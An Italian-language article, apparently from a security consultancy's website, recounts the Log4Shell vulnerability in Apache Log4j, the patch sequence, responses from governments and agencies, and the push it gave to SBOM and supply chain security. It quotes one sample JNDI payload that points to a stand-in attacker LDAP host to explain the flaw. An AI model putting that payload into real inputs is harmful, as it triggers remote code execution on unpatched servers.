EN Contattaci

Log4Shell (CVE-2021-44228): la vulnerabilità che ha cambiato la supply chain sicurezza

La vulnerabilità Apache Log4j 2.x CVE-2021-44228 rivelata il 9 dicembre 2021: remote code execution via JNDI lookup in log message, CVSS 10.0, impatto globale. Il punto di svolta che accelera SBOM, SCA e supply chain security.

Cyber SecurityOpen SourceCompliance
Cyber SecurityOpen SourceCompliance Log4ShellLog4jCVE-2021-44228Cyber SecuritySupply ChainApacheOpen Source
CyberScan

CyberScan

Vulnerability assessment e pentest automatizzato. Asset discovery continuo, AI risk prioritization, NIS2 compliance manager integrato.

Scopri CyberScan →DataGovern

DataGovern

Piattaforma di compliance integrata GDPR + NIS2 + EU AI Act. Cross-Regulation Gap analysis, dashboard board-ready, on-premise.

Scopri DataGovern →Cyber Security

Cyber Security

Consulenza CISO-as-a-service: postura, roadmap di remediation, supporto continuativo.

Scopri →

9 dicembre 2021

Il 9 dicembre 2021 l’Apache Software Foundation rilascia un advisory pubblico per CVE-2021-44228 — vulnerabilità critica in Apache Log4j 2.x, libreria di logging Java usata ubiquitariamente. La vulnerabilità — soprannominata Log4Shell — è stata scoperta da Chen Zhaojun del team Alibaba Cloud Security e riportata in modo responsabile.

CVSS v3: 10.0 (massimo). Impatto: Remote Code Execution (RCE) non autenticato tramite semplice stringa in input.

Il meccanismo: Log4j 2.x interpretava le espressioni ${jndi:ldap://attacker.com/a} presenti in messaggi di log come lookup JNDI (Java Naming and Directory Interface), scaricando e eseguendo codice Java da server LDAP arbitrari. Un attaccante poteva, inserendo la stringa in qualunque campo che finiva in log (User-Agent, header HTTP, form field), ottenere esecuzione di codice sul server.

Perché è stato enorme

Log4Shell ha colpito contemporaneamente:

  • Ubiquità di Log4j — libreria usata in decine di migliaia di applicazioni Java enterprise (banche, telco, servizi pubblici, SaaS, videogame — Minecraft server e client sono stati tra i primi colpiti)
  • Trigger banale — non richiede privilegi, non richiede autenticazione, basta inserire una stringa
  • Sfruttabilità immediata — proof-of-concept pubblici nelle ore successive
  • Supply chain profonda — Log4j è dipendenza di dipendenze; molte applicazioni non sapevano di usarla
  • Scansione di massa — nelle 48 ore successive, scansioni generalizzate su internet rilevano milioni di sistemi vulnerabili
  • Exploitation attiva — sfruttamento documentato da threat actor di tutti i livelli (criminali, APT, botnet)

La risposta

Apache Log4j rilascia patch in rapida sequenza:

  • 2.15.0 (9 dicembre) — disabilita lookup JNDI di default, ma ancora sfruttabile in alcune configurazioni
  • 2.16.0 (13 dicembre) — rimuove completamente la funzionalità di message lookup
  • 2.17.0 (17 dicembre) — corregge CVE-2021-45105 (DoS via recursive lookup)
  • 2.17.1 (28 dicembre) — corregge CVE-2021-44832 (RCE residua)

I SOC mondiali lavorano a tempo pieno per identificare sistemi vulnerabili e patcharli. Mitigation parziali (impostare log4j2.formatMsgNoLookups=true, rimuovere la classe JndiLookup dal JAR) sono distribuite mentre si procede con le patch.

Il ruolo di agenzie e governi

La risposta istituzionale è rapida e coordinata:

  • CISA (USA) — Emergency Directive 22-02 (17 dicembre 2021): obbligo per agenzie federali di patching immediato con reporting
  • NCSC-UK — advisory nazionale
  • ANSSI (Francia), BSI (Germania), CCN-CERT (Spagna) — advisory
  • ACN (Agenzia per la Cybersicurezza Nazionale italiana, operativa da agosto 2021) — alert e indicazioni operative
  • ENISA — coordinamento europeo

La scala della risposta istituzionale riflette la gravità reale.

Il messaggio strutturale

Log4Shell non è “solo” una vulnerabilità: è il sintomo sintetico di una serie di problemi strutturali dell’ecosistema open source:

Dipendenza su mantenitori volontari

Log4j è mantenuto da tre volontari principali. Questo non è un’eccezione: è lo schema tipico di librerie open source core utilizzate da tutta l’industria ma sostenute da piccoli team non finanziati adeguatamente. Il report Xkcd 2347 (“Dependency”) aveva già reso popolare il meme; Log4Shell l’ha trasformato in realtà palpabile.

SBOM — Software Bill of Materials

Molte organizzazioni non sapevano se usavano Log4j. Mancava un inventario delle dipendenze completo e aggiornato. L’idea di SBOM (standardizzata in SPDX e CycloneDX) diventa priorità assoluta. US Executive Order 14028 (maggio 2021) aveva già introdotto SBOM come requisito per software federale; Log4Shell accelera enormemente l’adozione.

Supply chain security

Log4Shell mostra che un bug in una libreria può avere impatto su mezzo internet. I programmi Supply-chain Levels for Software Artifacts (SLSA) di Google, Sigstore per firma di artefatti, OpenSSF Scorecard per valutare pratiche di sicurezza di progetti OSS diventano mainstream.

Scanning tools maturano

Software Composition Analysis (SCA) diventa standard in pipeline CI/CD:

  • Dependabot (GitHub)
  • Snyk
  • OWASP Dependency-Check
  • Trivy (Aqua Security)
  • Grype (Anchore)
  • Syft per generazione SBOM

Nel contesto italiano

La risposta italiana:

  • ACN — coordinamento con CSIRT Italia, avvisi alle infrastrutture critiche
  • Banche, telco, PA centrale — patching di emergenza nelle 72 ore
  • PMI — molte con difficoltà a identificare presenza di Log4j nelle dipendenze; servizi di supporto da MSP italiani si attivano
  • Audit successivi — scoperta di molti sistemi legacy con Log4j 1.x (EOL 2015, non ufficialmente vulnerabile ma con altri CVE)

L’esperienza italiana di Log4Shell informa successivamente la strategia nazionale di cybersicurezza 2022-2026 e la preparazione alla NIS2 (direttiva europea dicembre 2022, recepita in Italia con D.lgs. 138/2024).

Cosa resta

Log4Shell è un punto di non ritorno. Negli anni successivi:

  • SBOM obbligatorio in molti contesti federali USA e via NIS2 in Europa
  • Supply chain security come dominio crescente in cyber
  • Finanziamento delle libraryvolunteer-maintained — iniziative come Alpha-Omega (OpenSSF, 2022), sponsorship GitHub Sponsors, programmi corporate
  • SCA come componente standard di CI/CD
  • Incident response coordinata tra agenzie nazionali in eventi globali

Il 9 dicembre 2021 ha reso visibile a tutti — non solo ai CISO — la fragilità della infrastruttura software condivisa e l’urgenza di investimenti nella sicurezza dell’ecosistema open source che la industria aveva dato per scontata per decenni.

Riferimenti: CVE-2021-44228 (Log4Shell), 9 dicembre 2021. Apache Log4j 2.x. Chen Zhaojun (Alibaba Cloud Security Team) come segnalatore. CVSS v3: 10.0. CISA Emergency Directive 22-02. ACN Italia. US Executive Order 14028 (maggio 2021). SBOM (SPDX, CycloneDX). SLSA, Sigstore, OpenSSF.

Vuoi supporto? Sei sotto attacco? Stato dei servizi
Vuoi supporto? Sei sotto attacco? Stato dei servizi